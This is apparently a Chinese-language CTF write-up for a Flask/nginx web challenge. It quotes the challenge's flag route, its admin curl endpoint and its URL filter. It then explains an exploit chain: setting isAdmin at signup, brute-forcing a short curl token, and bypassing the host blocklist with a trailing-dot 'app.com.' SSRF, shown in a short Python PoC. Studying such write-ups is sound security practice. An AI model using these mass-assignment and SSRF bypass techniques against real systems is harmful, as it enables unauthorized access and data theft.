Background
不说出处了,贴一小部分代码,找到了说明你有缘 或者是国内又来抄题了
flag获取出口
@app.route('/app/flag', methods=['GET'])
def flag():
ip = ip_address(request.remote_addr)
if ip.is_private:
FLAG = open('./flag.txt','r').read()
return FLAG
else:
return f"Only local access allowed", 403要求我们访问/app/flag来获得flag
url = build_url(scheme, host, port, path)
if url:
for chr in ['@', '{', '}', ',']:
if chr in url:
return render_template('admin.html', msg='Not allowed string or character')
try:
response = run(
["curl", f"{url}"], capture_output=True, text=True, timeout=1
)
return render_template('admin.html', response=response.stdout)/app/admin有权限执行curl设想我们要curl这个 /app/flag就可以了
但是他这个build_url是自写的 还需要跟一下
def build_url(scheme, host, port, path=''):
try:
port = int(port)
if not (port > 1 or port < 0x10000):
return False
if not scheme.startswith('http') or len(scheme) > 9:
return False
host_pattern = r'^((\d{1,3}\.){3}\d{1,3}|([a-zA-Z0-9\-]+\.)+[a-zA-Z\.]{2,})$'
if not match(host_pattern,host):
return False
if not path[0] == '/':
path = '/' + path
url = (scheme + host + ':' + str(port) + path).lower()
parsed_url = parse.urlparse(url)
parsed_host = parsed_url.netloc.split(':')[0]
if (match(r'^((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])$', parsed_host) and ip_address(parsed_host).is_private) or (parsed_host == 'app.com'):
return False
return url关键点在于匹配到正常ip ip不能是私有的ip,我们要怎么发出这个curl 请求也是个关键
容器分两个部分nginx 和flask nginx配置了403鉴权
总结一下 1.需要先是admin权限 2.curl 在限制情况下访问到/app/flag
解析
看下这个代码
@app.route("/app/admin", methods=["GET", "POST"])
def admin():
if not session:
return redirect("/app/login")
if session["isAdmin"] == False:
return redirect("/app/guest")
if request.method == "GET":
return render_template("admin.html")
else:
if not request.cookies['X-CURL-TOKEN'] or request.cookies['X-CURL-TOKEN'] != '[**REDACTED**]':
return render_template('admin.html', msg='Token is not valid')
scheme = request.form['scheme'].strip()
host = request.form['host'].strip()
port = request.form['port'].strip()
path = request.form['path'].strip()
if scheme == '' or host == '' or port == '':
return redirect('/app/admin')
url = build_url(scheme, host, port, path)首先看看这个is_Admin怎么赋值的
values = {'isAdmin': 0}
values.update(request.form.to_dict(flat=True))如果表单数据中包含 'isAdmin' 键,它的值就会覆盖默认值 0 而且有一个X-CURL-TOKEN
有个奇妙的X-CURL-TOKEN 我都没仔细读 在nginx的entrypoint.sh有生成内容
#!/bin/bash
RANDOM_DIR=$(openssl rand -hex 1)
mkdir -p /etc/nginx/${RANDOM_DIR}
echo "CURL_TOKEN=[REDACTED]" > /etc/nginx/${RANDOM_DIR}/curl-token
exec "$@"一位的话是可以被爆破的
server {
listen 8001;
server_name _;
root /;
location = / {
proxy_pass http://app.com:8002/app;
}
location ~ ^/app/flag {
return 403;
}
location ~ ^/app {
proxy_pass http://app.com:8002;
proxy_set_header Host $Host;
proxy_set_header X-Real-IP $remote_addr;
}
}从nginx可以看到走了一层代理
而且在build url里可以看到检测了app.com的关键字 但可以用app.com.来绕过
这个tricks叫FQDN 意思是完全限定域名最后一个点 (.) 表示该域名是唯一的,并且不依赖于任何其他父域。这可能有效也可能无效,具体取决于 DNS 处理方法。
那就通了
注册1个用户 参数带上is_Admin=1 然后爆破X-CURL-TOken 再请求既可以 我放上部分poc
res = sess.post(f"{URL}/app/signup", data={"username": USERNAME, "password": PASSWORD, "isAdmin":1})
res = sess.post(f"{URL}/app/admin", data={'scheme': 'http://', 'host':'app.com.', 'port':'8002', 'path':'/app/flag'}, cookies={'X-CURL-TOKEN': CURL_TOKEN})后记
确实好题 思路很有趣的一个题 如果找到这了 大概率说明也被偷了 但你运气好奥